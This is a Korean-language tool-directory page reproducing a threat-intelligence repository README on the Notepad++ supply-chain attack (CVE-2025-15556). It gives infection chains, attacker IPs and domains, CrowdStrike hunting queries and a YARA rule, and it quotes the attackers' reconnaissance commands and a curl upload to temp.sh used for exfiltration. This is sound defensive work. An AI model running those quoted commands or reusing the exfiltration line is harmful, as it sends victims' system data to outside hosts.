Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
notepadpp-supply-chain-iocs — Notepad++ 공급망 공격(CVE-2025-15556) — Lotus Blossom APT, 2025년 6월~12월에 대한 IoC 및 탐지 규칙. Falcon LogScale 쿼리, YARA/Sigma 규칙 및 MITRE ATT&CK 매핑을 포함합니다. | Kitploit
도구/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
Indicator of Compromise (IOC) ManagementThreat Feeds & AggregatorsVulnerability AnalysisForensicsMalware AnalysisThreat IntelligenceSupply Chain SecurityLearning & EducationIncident Response

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

Notepad++ 공급망 공격(CVE-2025-15556) — Lotus Blossom APT, 2025년 6월~12월에 대한 IoC 및 탐지 규칙. Falcon LogScale 쿼리, YARA/Sigma 규칙 및 MITRE ATT&CK 매핑을 포함합니다.

저장소 보기
1207개월 전아직 검토되지 않음

Notepad++ 공급망 공격 — IoC 저장소

CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | 2025년 6월 ~ 12월

마지막 업데이트 IoC 개수 라이선스: MIT MITRE ATT&CK


개요

이 저장소는 2026년 2월 2일에 공개된 Notepad++ 공급망 공격과 관련된 포괄적이고 통합된 침해 지표(IoC) 모음입니다.

2025년 6월부터 12월까지, 중국 국가 지원 위협 행위자가 Notepad++의 호스팅 인프라를 침해하여 내장 업데이트 메커니즘(WinGUp)을 납치했습니다. 이를 통해 표적 사용자에게 선택적으로 트로이 목마화된 설치 프로그램을 전달했습니다. 이 공격은 업데이트 프로그램의 암호화 검증 부재(v8.8.9 이전)를 악용하여 맞춤형 백도어, Cobalt Strike Beacon 및 Metasploit 페이로드를 배포할 수 있게 했습니다.

주요 사실

CVECVE-2025-15556 — 무결성 검사 없이 코드 다운로드
위협 행위자Lotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon)
활동 기간2025년 6월 ~ 2025년 12월 2일
공격 벡터WinGUp 자동 업데이터를 통한 공급망 손상
표적정부, 통신, 금융 서비스, IT 공급업체 (필리핀, 베트남, 엘살바도르, 호주, 동아시아)
악성코드Chrysalis 백도어 (맞춤형), Cobalt Strike Beacon, Metasploit Meterpreter
패치 버전Notepad++ v8.8.9+ (인증서 확인) / v8.9.1+ (XMLDSig 검증)

감염 체인

Kaspersky GReAT는 세 가지의 별개 감염 체인을 식별했으며, 대략 매월 교체되어 탐지를 회피했습니다:

체인 #1 — 2025년 7월/8월

GUP.exe → update.exe (NSIS) → ProShow.exe (정상) → "load" 파일을 통한 익스플로잇
  → Metasploit 다운로더 → Cobalt Strike Beacon
  • DLL 사이드로딩 대신 ProShow 소프트웨어의 오래된 취약점을 악용
  • 정찰: whoami && tasklist → temp.sh를 통해 유출
  • 작업 디렉토리: %appdata%\ProShow\

체인 #2 — 2025년 9월/10월

GUP.exe → update.exe (NSIS) → script.exe (Lua 인터프리터) → alien.ini (컴파일된 Lua)
  → EnumWindowStationsW를 통한 셸코드 → Metasploit 다운로더 → Cobalt Strike Beacon
  • 정상 Lua 인터프리터를 사용하여 컴파일된 셸코드 실행
  • 확장된 정찰: whoami && tasklist && systeminfo && netstat -ano
  • 작업 디렉토리: %appdata%\Adobe\Scripts\

체인 #3 — 2025년 10월

GUP.exe → update.exe (NSIS) → BluetoothService.exe (정상) → log.dll (사이드로드됨)
  → "BluetoothService" 셸코드 복호화 → Chrysalis 백도어
  • 전형적인 DLL 사이드로딩 기술
  • 내장 정찰 없음 (체인 1 및 2와 달리)
  • 작업 디렉토리: %appdata%\Bluetooth\
  • 관련 Cobalt Strike Beacon이 C:\ProgramData\USOShared\에서 발견됨
                     ┌─────────────────────────────────────────────────────────┐
                     │              침해 타임라인                              │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │ 25/07   │ 25/08   │ 25/09   │ 25/10   │ 25/11   │25/12 │
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  체인 #1 (ProShow)  │████████████████████                                    │
  체인 #2 (Lua)      │                    █████████████████████████████        │
  체인 #3 (DLL SL)   │                              ██████████████            │
  인프라 접근        │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

저장소 내용

파일설명
notepadpp_supply_chain_iocs.csv전체 IoC 데이터셋 (105개 지표) 및 MITRE ATT&CK 매핑 포함

CSV 스키마

열설명
ioc_type유형: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_value지표 값
chain감염 체인 (1, 2, 3, 1/2, 2/3, all, n/a)
contextIoC가 나타내는 내용 설명
source인텔리전스 출처 (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
risk심각도 (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueMITRE ATT&CK 기술 ID

탐지 및 위협 헌팅

우선 지표 (여기서 시작)

행위 기반 — IoC 독립적, 가장 높은 가치:

  • gup.exe가 정상적인 서명된 Notepad++ 설치 프로그램 이외의 자식 프로세스를 생성하는 경우
  • gup.exe가 notepad-plus-plus.org, github.com, release-assets.githubusercontent.com 이외의 도메인/IP에 연결하는 경우
  • 디렉토리 생성: %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • %localappdata%\Temp\ns.tmp\ 생성 (NSIS 런타임 — 모든 체인에 존재)

네트워크 — 신뢰도 높음:

  • cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com의 DNS 해석
  • temp.sh (51.91.79.17)로의 연결 — 특히 curl을 통한 파일 업로드
  • User-Agent 헤더에 temp.sh URL이 포함된 HTTP 요청
  • 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210로의 아웃바운드 연결

정찰 명령 (사후 악용):

cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

CrowdStrike Falcon LogScale 쿼리

행위: GUP.exe 자식 프로세스 헌팅
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
프로세스, 네트워크, DNS 이벤트에 걸친 다중 IoC 헌팅
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
    // 악성 IP
    RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
        | iocType := "악성 IP" | iocValue := RemoteAddressIP4 | riskScore := "높음";
    // 악성 도메인
    DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
        | iocType := "악성 도메인" | iocValue := DomainName | riskScore := "높음";
    // 의심스러운 파일명
    ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
        | iocType := "의심스러운 파일명" | iocValue := ImageFileName | riskScore := "중간";
    // 의심스러운 DLL
    ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
        | iocType := "의심스러운 DLL" | iocValue := ImageFileName | riskScore := "중간";
    // 체인별 아티팩트
    ImageFileName=/\\(alien\.ini|load)$/i
        | iocType := "체인 아티팩트" | iocValue := ImageFileName | riskScore := "높음";
    * | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)
NSIS 설치 프로그램 탐지 (모든 체인)
#event_simpleName=DirectoryCreate event_platform=Win
| FilePath=/\\ns\.tmp$/i
| FilePath=/\\Temp\\ns\.tmp$/i
| groupBy([aid, ComputerName, FilePath, ContextTimeStamp], limit=5000)

YARA 규칙 (NSIS + 정찰 패턴)

악성 NSIS 업데이터를 위한 YARA 규칙
rule Notepadpp_SupplyChain_MaliciousUpdater {
    meta:
        description = "Notepad++ 공급망 공격에서 악성 NSIS 설치 프로그램 탐지"
        author = "Renato Z3r0 ed i miei sorcini"
        date = "2026-02"
        reference = "https://securelist.com/notepad-supply-chain-attack/118708/"
        tlp = "WHITE"
        
    strings:
        $nsis = "Nullsoft.NSIS" ascii
        $recon1 = "whoami" ascii nocase
        $recon2 = "tasklist" ascii nocase
        $recon3 = "systeminfo" ascii nocase
        $recon4 = "netstat -ano" ascii nocase
        $exfil = "temp.sh/upload" ascii nocase
        $curl = "curl" ascii nocase
        $dir1 = "\\ProShow\\" ascii nocase
        $dir2 = "\\Adobe\\Scripts\\" ascii nocase
        $dir3 = "\\Bluetooth\\" ascii nocase
        
    condition:
        uint16(0) == 0x5A4D and
        $nsis and
        (2 of ($recon*) or $exfil or ($curl and 1 of ($recon*))) and
        1 of ($dir*)
}

Sigma 규칙

Sigma: GUP.exe 의심스러운 자식 프로세스
도구 다운로드